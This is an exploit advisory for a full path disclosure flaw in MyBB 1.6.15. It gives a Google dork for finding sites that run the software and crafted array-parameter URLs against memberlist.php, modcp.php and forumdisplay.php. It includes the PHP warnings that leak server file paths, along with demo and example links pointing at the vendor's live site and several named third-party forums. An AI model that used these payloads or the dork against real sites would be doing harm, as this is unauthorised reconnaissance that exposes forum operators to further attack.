# Title: MyBB 1.6.15 - Full Path Disclosure # Google Dork: intext:"Powered By MyBB" # Date: 08.08.2014 # Author: DemoLisH # Vendor Homepage: http://www.mybb.com/ # Software Link: http://www.mybb.com/downloads # Version: 1.6.15 - Latest Version # Contact: onur@b3yaz.org *************************************************** [~#~] Exploit: memberlist.php?sort[$victor]=getdaily modcp.php?action=ipsearch&ipaddress[$victor]=getdaily forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily [~#~] Demo: http://community.mybb.com/memberlist.php?sort[$victor]=getdaily http://community.mybb.com/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily [~#~] Error: Warning [2] strtolower() expects parameter 1 to be string, array given - Line: 58 - File: memberlist.php PHP 5.4.28-1~dotdeb.1 (Linux) Warning [2] mb_strtolower() expects parameter 1 to be string, array given - Line: 4566 - File: inc/functions.php PHP 5.4.28-1~dotdeb.1 (Linux) [~#~] Example: http://mybXb.co.il/forum/memberlist.php?sort[$victor]=getdaily http://mybXb.co.il/forum/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily http://www.mXybb.fr/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily http://destek.myXbb.com.tr/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily http://www.myXbb.biz/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily *************************************************** [~#~] Thanks To: ynR !, T3kfurD4GLi, X-X-X, PoseidonKairos, Mugair and all B3yaz.Org Members.